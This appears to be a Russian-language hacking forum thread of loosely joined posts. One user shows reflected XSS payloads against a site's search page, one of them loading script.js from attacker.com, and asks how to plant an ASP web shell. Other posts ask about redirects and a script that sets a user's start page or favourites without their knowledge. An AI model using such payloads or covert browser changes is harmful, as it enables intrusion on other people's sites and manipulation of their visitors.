Привет народ!

Собссно такое дело.....есть сайт на котором иксэсэс такова рода:
_http://site.com/search.asp?query="><script>alert()</script>

хз какова типа (пассивный или активный), можна ли залить на него асп-эшный шелл таким путём? если да, то расскажите по подробней плз, а то в иксэсэсах я не очень шарю. Я уже пробовал таким путём прописать его:
_http://site.com/search.asp?query="><script src=http://attacker.com/script.js></script>
Где скрипт.жс указывает прописать шелл на (в) страницу с функцией document.write() , но в итоге я получаю контент этого шелла на странице.

Подскажте плз...

//ЗЫ: Со снифером дело отпадает....

Хех......)) чета я об этом даже и не подумал (о выполнение кода в браузере а не на серваке).....хм.....аякс я к сожелению не знаю.....эта значит я в пролёте? да уж....фигня какая то ((......а че можна в таком случае еще сделать?

Всем привет, подскажите плиз скрипт редиректа без задержки. Есть такой :

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://">

Но он всёрабно перед загрузкой нужной страницы заходит на главную....

Спасибо!

Только при помощи php или htaccess.

Понял, спасибо! впринципе уже добился чего хотел, а ещё такой вопрос. Подскажите скрипт который добавляет нужную страницу на стартовую страницу, и\или в избранное без ведома юзера!!!!

Макс 8===3, кстати, редирект можно и с помощью JS замутить, и будет, вроде как без задержки.
Правда в случае отключенного JS, ясен, не покатит, так-что PHP вариант рулит ;) но раз уж тут тема про JS решил запостить.

Каким образом можно сделать подтверждение нажатия на ссылку? Дайте пример

че-то непашет)) наверно из-за неправильного кода в a href

ну ковычку сами догадаетесь поставить.